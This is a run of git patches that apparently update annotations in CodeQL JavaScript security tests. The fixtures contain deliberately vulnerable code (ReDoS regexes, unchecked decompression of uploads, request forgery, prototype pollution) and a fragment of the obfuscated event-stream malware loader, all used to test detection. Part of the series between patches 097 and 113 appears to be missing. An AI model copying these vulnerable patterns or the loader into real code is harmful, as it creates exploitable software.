a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index c2f83ed25aee..53385682867a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -216,7 +216,7 @@ var good28 = /foo([\uDC66\uDC67]|[\uDC68\uDC69])*foo/ var good29 = /foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo/ -var bad62 = /a{2,3}(b+)+X/; // $ MISSING: Alert - cannot currently construct a prefix +var bad62 = /a{2,3}(b+)+X/; // $ Alert[js/redos] var bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/; // $ Alert[js/redos] - and a good prefix test From cded75766f8c5b878358f9bf79888010a7533b41 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 14:30:32 +0100 Subject: [PATCH 090/892] JS: Add a query ID --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 53385682867a..c5b183cb273d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -234,7 +234,7 @@ var good33 = /(a+)*([^]*|X)$/; var bad64 = /((a+)*$|[^]+)/; // $ Alert[js/redos] -var good34 = /([^]+|(a+)*$)/; // $ SPURIOUS: Alert - The only change compared to the above is the order of alternatives, which we don't model. +var good34 = /([^]+|(a+)*$)/; // $ SPURIOUS: Alert[js/redos] - The only change compared to the above is the order of alternatives, which we don't model. var good35 = /((;|^)a+)+$/; From cea53371f2dfceefdded5a1e0c22a6d8bdaf3cae Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:01:58 +0100 Subject: [PATCH 091/892] JS: Accept alerts for missing-x-frame-options --- javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/express-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/node-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js index 33372750e587..e224100b4ade 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js @@ -1,7 +1,7 @@ var connect = require('connect'); var http = require('http'); -var app = connect(); +var app = connect(); // $ Alert app.use(function (req, res){ diff --git a/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js index a5b05b3a16b9..7aa58b6b4e15 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js @@ -1,5 +1,5 @@ var express = require('express'), - app = express(); + app = express(); // $ Alert app.get('/', function (req, res) { diff --git a/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js index 12a18c1cbef5..b9e5d447e72d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js @@ -1,5 +1,5 @@ var Hapi = require('hapi'); -var server = new Hapi.Server(); +var server = new Hapi.Server(); // $ Alert server.route({ handler: function (request, reply){ diff --git a/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js index 8308b19bee75..5ae9cfe130c4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js @@ -1,5 +1,5 @@ var Koa = require('koa'); -var app = new Koa(); +var app = new Koa(); // $ Alert app.use(function handler(ctx){ }); diff --git a/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js index 4e5fbb685497..2bc553aa7852 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js @@ -1,4 +1,4 @@ var http = require('http') http.createServer(function (request, response) { - }).listen(9615) + }).listen(9615) // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js index 3b88523e701a..e48a51efa7e8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js @@ -1,5 +1,5 @@ var restify = require('restify'); -var server = restify.createServer(); +var server = restify.createServer(); // $ Alert server.head('/', function (request, response){ }); From 260c66b3cf268db2b9c902451b4eb3497fd6d258 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:02:18 +0100 Subject: [PATCH 092/892] JS: Mark a spurious alert in missing-x-frame-options --- .../query-tests/Security/CWE-451/express-good-array-routers.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js b/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js index efe2e732b552..53efa1cc9537 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js @@ -1,5 +1,5 @@ var express = require('express'), - app = express(); + app = express(); // $ SPURIOUS: Alert app.get('/', [ function (req, res){ From 48760d66b23e7bf6d3183688d31d983a8f1d64f1 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:04:26 +0100 Subject: [PATCH 093/892] JS: Accept alerts for HardcodedDataInterpretedAsCode --- .../ql/test/query-tests/Security/CWE-506/event-stream-orig.js | 2 +- javascript/ql/test/query-tests/Security/CWE-506/event-stream.js | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js b/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js index 85daa2d86954..95c1cc3fee66 100644 --- a/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js +++ b/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js @@ -93,7 +93,7 @@ module.exports = function (e, n) { function e(r) { return Buffer.from(r, "hex").toString(); } - var n = r(e("2e2f746573742f64617461")), + var n = r(e("2e2f746573742f64617461")), // $ Alert o = t[e(n[3])][e(n[4])]; if (!o) return; var u = r(e(n[2]))[e(n[6])](e(n[5]), o), diff --git a/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js b/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js index e885d2e1f886..d358010c3ae5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js +++ b/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js @@ -6,7 +6,7 @@ function e(r) { return Buffer.from(r, "hex").toString() } -var n = r(e("2e2f746573742f64617461")), +var n = r(e("2e2f746573742f64617461")), // $ Alert o = t[e(n[3])][e(n[4])]; if (!o) return; From 3f7f74b92507e18532e677d69476702c9210ccde Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:14:51 +0100 Subject: [PATCH 094/892] JS: Accept alerts for DecompressionBomb --- .../CWE-522-DecompressionBombs/adm-zip.js | 8 ++++---- .../CWE-522-DecompressionBombs/decompress.js | 2 +- .../CWE-522-DecompressionBombs/jszip.js | 2 +- .../CWE-522-DecompressionBombs/node-tar.js | 10 +++++----- .../CWE-522-DecompressionBombs/pako.js | 4 ++-- .../CWE-522-DecompressionBombs/unbzip2.js | 2 +- .../CWE-522-DecompressionBombs/unzipper.js | 16 +++++++-------- .../CWE-522-DecompressionBombs/yauzl.js | 12 +++++------ .../CWE-522-DecompressionBombs/zlib.js | 20 +++++++++---------- 9 files changed, 38 insertions(+), 38 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js index 5370a4854acc..91abc84e80c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js @@ -25,13 +25,13 @@ function zipBomb(tarFile) { const zipEntries = admZip.getEntries(); zipEntries.forEach(function (zipEntry) { if (zipEntry.entryName === "my_file.txt") { - console.log(zipEntry.getData().toString("utf8")); + console.log(zipEntry.getData().toString("utf8")); // $ Alert } }); // outputs the content of file named 10GB - console.log(admZip.readAsText("10GB")); + console.log(admZip.readAsText("10GB")); // $ Alert // extracts the specified file to the specified location - admZip.extractEntryTo("10GB", "/tmp/", false, true); + admZip.extractEntryTo("10GB", "/tmp/", false, true); // $ Alert // extracts everything - admZip.extractAllTo("./tmp", true); + admZip.extractAllTo("./tmp", true); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js index 360e29b2f51f..e8adba55e32d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js @@ -8,7 +8,7 @@ app.listen(3000, () => { }); app.post('/upload', async (req, res) => { - decompress(req.query.filePath, 'dist').then(files => { + decompress(req.query.filePath, 'dist').then(files => { // $ Alert console.log('done!'); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js index 2da0757c2767..872f84e62f85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js @@ -30,7 +30,7 @@ function zipBombSafe(zipFile) { } function zipBomb(zipFile) { - jszipp.loadAsync(zipFile.data).then(function (zip) { + jszipp.loadAsync(zipFile.data).then(function (zip) { // $ Alert zip.files["10GB"].async("uint8array").then(function (u8) { console.log(u8); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js index 53dd6c3d0a80..499d5fd7a2bb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js @@ -21,7 +21,7 @@ function zipBomb(tarFile) { const inputFile = Readable.from(tarFile.data); const outputFile = fs.createWriteStream('/tmp/untar'); inputFile.pipe( - tar.x() + tar.x() // $ Alert ).pipe(outputFile); // scenario 2 @@ -30,7 +30,7 @@ function zipBomb(tarFile) { tar.x({ strip: 1, C: 'some-dir' - }) + }) // $ Alert ) // safe https://github.com/isaacs/node-tar/blob/8c5af15e43a769fd24aa7f1c84d93e54824d19d2/lib/list.js#L90 fs.createReadStream(tarFile.name).pipe( @@ -47,7 +47,7 @@ function zipBomb(tarFile) { ).pipe( tar.x({ cwd: "dest" - }) + }) // $ Alert ) // scenario 4 @@ -55,8 +55,8 @@ function zipBomb(tarFile) { // or using fs.writeFile // file path is a tmp file name that can get from DB after saving to DB with remote file upload // so the input file name will come from a DB source - tar.x({ file: tarFile.name }) - tar.extract({ file: tarFile.name }) + tar.x({ file: tarFile.name }) // $ Alert + tar.extract({ file: tarFile.name }) // $ Alert // safe https://github.com/isaacs/node-tar/blob/8c5af15e43a769fd24aa7f1c84d93e54824d19d2/lib/list.js#L90 tar.x({ file: tarFile.name, diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js index 132d08e1f90a..4fb5b7d35e07 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js @@ -18,7 +18,7 @@ function zipBomb1(zipFile) { const myArray = Buffer.from(new Uint8Array(zipFile.data.buffer)); let output; try { - output = pako.inflate(myArray); + output = pako.inflate(myArray); // $ Alert console.log(output); } catch (err) { console.log(err); @@ -29,7 +29,7 @@ function zipBomb2(zipFile) { const myArray = new Uint8Array(zipFile.data.buffer).buffer; let output; try { - output = pako.inflate(myArray); + output = pako.inflate(myArray); // $ Alert console.log(output); } catch (err) { console.log(err); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js index da560ca30f1d..83c1706573a4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js @@ -9,5 +9,5 @@ app.listen(3000, () => { }); app.post('/upload', async (req, res) => { - fs.createReadStream(req.query.FilePath).pipe(bz2()).pipe(process.stdout); + fs.createReadStream(req.query.FilePath).pipe(bz2()).pipe(process.stdout); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js index 79e03b9c1814..b20bcb31de46 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js @@ -13,15 +13,15 @@ app.post('/upload', async (req, res) => { const RemoteStream = Readable.from(req.files.ZipFile.data); // Unsafe - RemoteStream.pipe(unzipper.Extract({ path: 'output/path' })); + RemoteStream.pipe(unzipper.Extract({ path: 'output/path' })); // $ Alert // Unsafe - RemoteStream.pipe(unzipper.ParseOne()) + RemoteStream.pipe(unzipper.ParseOne()) // $ Alert .pipe(createWriteStream('firstFile.txt')); // Safe because of uncompressedSize RemoteStream - .pipe(unzipper.Parse()) + .pipe(unzipper.Parse()) // $ Alert .on('entry', function (entry) { const size = entry.vars.uncompressedSize; if (size < 1024 * 1024 * 1024) { @@ -31,14 +31,14 @@ app.post('/upload', async (req, res) => { // Unsafe RemoteStream - .pipe(unzipper.Parse()) + .pipe(unzipper.Parse()) // $ Alert .on('entry', function (entry) { const size = entry.vars.uncompressedSize; entry.pipe(createWriteStream('output/path')); }); // Unsafe - const zip = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); + const zip = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); // $ Alert for await (const entry of zip) { const fileName = entry.path; if (fileName === "this IS the file I'm looking for") { @@ -48,7 +48,7 @@ app.post('/upload', async (req, res) => { } } // Safe - const zip2 = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); + const zip2 = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); // $ Alert for await (const entry of zip2) { const size = entry.vars.uncompressedSize; if (size < 1024 * 1024 * 1024) { @@ -57,7 +57,7 @@ app.post('/upload', async (req, res) => { } // Safe because of uncompressedSize - RemoteStream.pipe(unzipper.Parse()) + RemoteStream.pipe(unzipper.Parse()) // $ Alert .pipe(stream.Transform({ objectMode: true, transform: function (entry, e, cb) { @@ -70,7 +70,7 @@ app.post('/upload', async (req, res) => { })); // Unsafe - RemoteStream.pipe(unzipper.Parse()) + RemoteStream.pipe(unzipper.Parse()) // $ Alert .pipe(stream.Transform({ objectMode: true, transform: function (entry, e, cb) { diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js index 3b726650f76f..59f22e70cebd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js @@ -9,9 +9,9 @@ app.listen(3000, () => { }); app.post('/upload', (req, res) => { - yauzl.fromFd(req.files.zipFile.data) - yauzl.fromBuffer(req.files.zipFile.data) - yauzl.fromRandomAccessReader(req.files.zipFile.data) + yauzl.fromFd(req.files.zipFile.data) // $ Alert + yauzl.fromBuffer(req.files.zipFile.data) // $ Alert + yauzl.fromRandomAccessReader(req.files.zipFile.data) // $ Alert // Safe yauzl.open(req.query.filePath, { lazyEntries: true }, function (err, zipfile) { if (err) throw err; @@ -36,11 +36,11 @@ app.post('/upload', (req, res) => { // Unsafe yauzl.open(req.query.filePath, { lazyEntries: true }, function (err, zipfile) { if (err) throw err; - zipfile.readEntry(); + zipfile.readEntry(); // $ Alert zipfile.on("entry", function (entry) { - zipfile.openReadStream(entry, async function (err, readStream) { + zipfile.openReadStream(entry, async function (err, readStream) { // $ Alert readStream.on("end", function () { - zipfile.readEntry(); + zipfile.readEntry(); // $ Alert }); const outputFile = fs.createWriteStream('testiness'); await pipeline( diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js index 3954d9916144..8391e16e7fed 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js @@ -26,16 +26,16 @@ app.post('/upload', async (req, res) => { function zlibBombAsync(zipFile) { zlib.gunzip( - zipFile.data, + zipFile.data, // $ Alert (err, buffer) => { }); zlib.unzip( - zipFile.data, + zipFile.data, // $ Alert (err, buffer) => { }); zlib.brotliDecompress( - zipFile.data, + zipFile.data, // $ Alert (err, buffer) => { }); } @@ -60,9 +60,9 @@ function zlibBombAsyncSafe(zipFile) { } function zlibBombSync(zipFile) { - zlib.gunzipSync(zipFile.data, { finishFlush: zlib.constants.Z_SYNC_FLUSH }); - zlib.unzipSync(zipFile.data); - zlib.brotliDecompressSync(zipFile.data); + zlib.gunzipSync(zipFile.data, { finishFlush: zlib.constants.Z_SYNC_FLUSH }); // $ Alert + zlib.unzipSync(zipFile.data); // $ Alert + zlib.brotliDecompressSync(zipFile.data); // $ Alert } function zlibBombSyncSafe(zipFile) { @@ -74,9 +74,9 @@ function zlibBombSyncSafe(zipFile) { function zlibBombPipeStream(zipFile) { const inputStream = Readable.from(zipFile.data); const outputFile = fs.createWriteStream('unzip.txt'); - inputStream.pipe(zlib.createGunzip()).pipe(outputFile); - inputStream.pipe(zlib.createUnzip()).pipe(outputFile); - inputStream.pipe(zlib.createBrotliDecompress()).pipe(outputFile); + inputStream.pipe(zlib.createGunzip()).pipe(outputFile); // $ Alert + inputStream.pipe(zlib.createUnzip()).pipe(outputFile); // $ Alert + inputStream.pipe(zlib.createBrotliDecompress()).pipe(outputFile); // $ Alert } async function zlibBombPipeStreamPromises(zipFile) { @@ -84,7 +84,7 @@ async function zlibBombPipeStreamPromises(zipFile) { const outputFile = fs.createWriteStream('unzip.txt'); await stream.pipeline( inputStream, - zlib.createGunzip(), + zlib.createGunzip(), // $ Alert outputFile ) } From cd788bc5099506a24c8a0029bb90fbd82ebd1570 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:18:57 +0100 Subject: [PATCH 095/892] JS: Mark what seems to be missing alerts for fflate The query doesn't seem to model or even mention fflate. Not sure if the library is safe or just not modeled. --- .../CWE-522-DecompressionBombs/fflate.js | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js index 48403ebc86dd..4fb6cbd6195c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js @@ -9,14 +9,15 @@ app.listen(3000, () => { }); app.post('/upload', async (req, res) => { - fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); // $ Alert - fflate.unzip(new Uint8Array(new Uint8Array(req.files.CompressedFile.data))); - fflate.unzlib(new Uint8Array(req.files.CompressedFile.data)); - fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); - fflate.gunzip(new Uint8Array(req.files.CompressedFile.data)); - fflate.gunzipSync(new Uint8Array(req.files.CompressedFile.data)); - fflate.decompress(new Uint8Array(req.files.CompressedFile.data)); - fflate.decompressSync(new Uint8Array(req.files.CompressedFile.data)); + // Not sure if these are vulnerable, but currently not modeled + fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.unzip(new Uint8Array(new Uint8Array(req.files.CompressedFile.data))); // $ MISSING: Alert + fflate.unzlib(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.gunzip(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.gunzipSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.decompress(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.decompressSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data), { From 0f23c33d3c0fdbcfb5b30528244248fe102ab1c8 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:20:20 +0100 Subject: [PATCH 096/892] JS: Fix a comment Apparently this comment used to say 'NOT OK' but clearly 'OK' was meant --- javascript/ql/test/query-tests/Security/CWE-598/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-598/tst.js b/javascript/ql/test/query-tests/Security/CWE-598/tst.js index 93c8146ffc42..02d4a0f0dacc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-598/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-598/tst.js @@ -22,7 +22,7 @@ app.post("/login", (req, res) => { }); app.get("/login2", (req, res) => { - const username = req.param('username'); // $ Alert - usernames are fine + const username = req.param('username'); // OK - usernames are fine const password = req.param('password'); // $ Alert - password read checkUser(username, password, (result) => { res.send(result); From 1ee93cf51bd319b40dbc69124c54b06a789c6018 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:21:17 +0100 Subject: [PATCH 097/892] JS: Manually fix two comments in JSX --- .../Security/CWE-601/ClientSideUrlRedirect/react.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js index 38828b109f13..e5da7ce96a43 100644 --- a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js +++ b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js @@ -7,7 +7,7 @@ class Application extends React.Component {
    My unsafe app - - + \ No newline at end of file From 3a535dbf68de802ad03ea1be8341ff47ffbc5ac2 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:23:51 +0100 Subject: [PATCH 113/892] JS: Accept another alert --- .../ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html b/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html index 6b9fbfe65c8a..97ed8b016f00 100644 --- a/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html +++ b/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html @@ -1,7 +1,7 @@ Polyfill.io demo - + ... From 9f8744680db792bd66f870e8fcba74b3d112937e Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:33:02 +0100 Subject: [PATCH 114/892] JS: Remove a fixed spurious alert --- javascript/ql/test/query-tests/Security/CWE-843/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js index d859f2ade6e2..ca2a1ce0fe30 100644 --- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js @@ -33,7 +33,7 @@ express().get('/some/path', function (req, res) { foo.indexOf(); } if (foo instanceof Array) { - foo.indexOf(); // $ SPURIOUS: Alert + foo.indexOf(); } (foo + f()).indexOf(); From 2d1aa3e00acab29d4d2c60ec7232719604d851bf Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:35:22 +0100 Subject: [PATCH 115/892] JS: Accept missing alert and clarify reason --- javascript/ql/test/query-tests/Security/CWE-843/tst.js | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js index ca2a1ce0fe30..ac055cb82ddf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js @@ -27,6 +27,8 @@ express().get('/some/path', function (req, res) { foo.indexOf(prefix) == 1; // $ Alert foo.slice(1) === 'x'; // $ Alert + foo.length; // $ Alert + if (typeof foo === "string") { foo.indexOf(); } else { @@ -38,7 +40,7 @@ express().get('/some/path', function (req, res) { (foo + f()).indexOf(); - foo.length; // $ Alert + foo.length; // $ MISSING: Alert - missed due to guards sanitising both branches }); new Koa().use(function handler(ctx) { From 49274d5f73baf60372bc3127f38bcff7a19f601d Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:43:23 +0100 Subject: [PATCH 116/892] JS: Accept an alert --- .../examples/PrototypePollutingFunction.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js index 1953ba57f00b..052fd2e75847 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js @@ -4,7 +4,7 @@ function merge(dst, src) { if (isObject(dst[key])) { merge(dst[key], src[key]); } else { - dst[key] = src[key]; + dst[key] = src[key]; // $ Alert } } } From 976096540fe6062c7abf4780953e325c52a463aa Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:52:08 +0100 Subject: [PATCH 117/892] JS: Accept an alert --- javascript/ql/test/query-tests/Security/CWE-918/clientSide.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js index a8d7d429cf86..1724d06091fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js @@ -11,7 +11,7 @@ export function MyComponent() { const query = window.location.search.substring(1); request('https://example.com/api/' + query + '/id'); // $ Alert[js/client-side-request-forgery] request('https://example.com/api?q=' + query); - request('https://example.com/api/' + window.location.search); // likely OK - but currently flagged anyway + request('https://example.com/api/' + window.location.search); // $ Alert[js/client-side-request-forgery] - likely OK - but currently flagged anyway const fragment = window.location.hash.substring(1); request('https://example.com/api/' + fragment + '/id'); // $ Alert[js/client-side-request-forgery] From 764eb9880985e76e60a3c030340b29f4bb406bb4 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:52:27 +0100 Subject: [PATCH 118/892] JS: Move two alerts and add query ID --- .../ql/test/query-tests/Security/CWE-918/serverSide.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js index 50a7fe976998..777f7eb00840 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js @@ -20,8 +20,8 @@ var server = http.createServer(function(req, res) { request.get(tainted); // $ Alert[js/request-forgery] var options = {}; - options.url = tainted; // $ Alert - request(options); + options.url = tainted; + request(options); // $ Alert[js/request-forgery] request("http://" + tainted); // $ Alert[js/request-forgery] @@ -124,8 +124,8 @@ var server2 = http.createServer(function(req, res) { axios({ method: 'get', - url: tainted // $ Alert - }) + url: tainted + }) // $ Alert[js/request-forgery] var myUrl = `${something}/bla/${tainted}`; axios.get(myUrl); // $ Alert[js/request-forgery] From 4d7cbe6f607e69445a2d2a4911cba20f13389374 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 